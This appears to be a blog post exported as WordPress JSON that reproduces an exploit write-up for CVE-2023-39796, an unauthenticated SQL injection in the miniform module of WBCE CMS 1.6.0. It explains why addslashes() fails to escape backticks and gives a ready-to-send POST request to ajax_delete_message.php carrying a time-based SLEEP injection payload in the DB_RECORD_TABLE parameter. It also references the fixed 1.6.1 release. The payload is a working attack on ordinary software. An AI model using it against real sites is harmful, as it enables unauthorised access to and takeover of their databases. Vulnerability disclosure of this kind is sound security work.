# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0
# Date: 15.11.2023
# Exploit Author: young pope
# Vendor Homepage: https:\/\/github.com\/WBCE\/WBCE_CMS
# Software Link: https:\/\/github.com\/WBCE\/WBCE_CMS\/archive\/refs\/tags\/1.6.0.zip
# Version: 1.6.0
# Tested on: Kali linux
# CVE : CVE-2023-39796<\/p>\n
There is an sql injection vulnerability in *miniform* module which is a
default module installed in the *WBCE* cms. It is an unauthenticated
sqli so anyone could access it and takeover the whole database.<\/p>\n
In file \/modules\/miniform\/ajax_delete_message.php there is no
authentication check. On line |40| in this file, there is a |DELETE|
query that is vulnerable, an attacker could jump from the query using
tick sign – “`.<\/p>\n
Function |addslashes()|
(https:\/\/www.php.net\/manual\/en\/function.addslashes.php) escapes only
these characters and not a tick sign:<\/p>\n
* single quote (‘)
* double quote (“)
* backslash ()
* NUL (the NUL byte<\/p>\n
The DB_RECORD_TABLE parameter is vulnerable.<\/p>\n
If an unauthenticated attacker send this request:<\/p>\n
“`<\/p>\n
POST \/modules\/miniform\/ajax_delete_message.php HTTP\/1.1
Host: localhost
User-Agent: Mozilla\/5.0 (X11; OpenBSD i386) AppleWebKit\/537.36 (KHTML,
like Gecko) Chrome\/36.0.1985.125 Safari\/537.36
Connection: close
Content-Length: 162
Accept: *\/*
Accept-Language: en
Content-Type: application\/x-www-form-urlencoded
Accept-Encoding: gzip, deflate<\/p>\n
action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)–+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record<\/p>\n
“`<\/p>\n
The response is received after 6s.<\/p>\n
Reference links:<\/p>\n
* https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-39796
* https:\/\/forum.wbce.org\/viewtopic.php?pid=42046#p42046
* https:\/\/github.com\/WBCE\/WBCE_CMS\/releases\/tag\/1.6.1
* https:\/\/pastebin.com\/PBw5AvGp<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0# Date: 15.11.2023 # Exploit Author: young pope # Vendor Homepage: https:\/\/github.com\/WBCE\/WBCE_CMS # Software Link: https:\/\/github.com\/WBCE\/WBCE_CMS\/archive\/refs\/tags\/1.6.0.zip # Version: 1.6.0 # Tested on: Kali linux # CVE : CVE-2023-39796 There is an sql injection vulnerability in *miniform* module which is a default module installed in the *WBCE* cms. …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56268","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56268","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56268"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56268\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56268"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56268"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56268"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}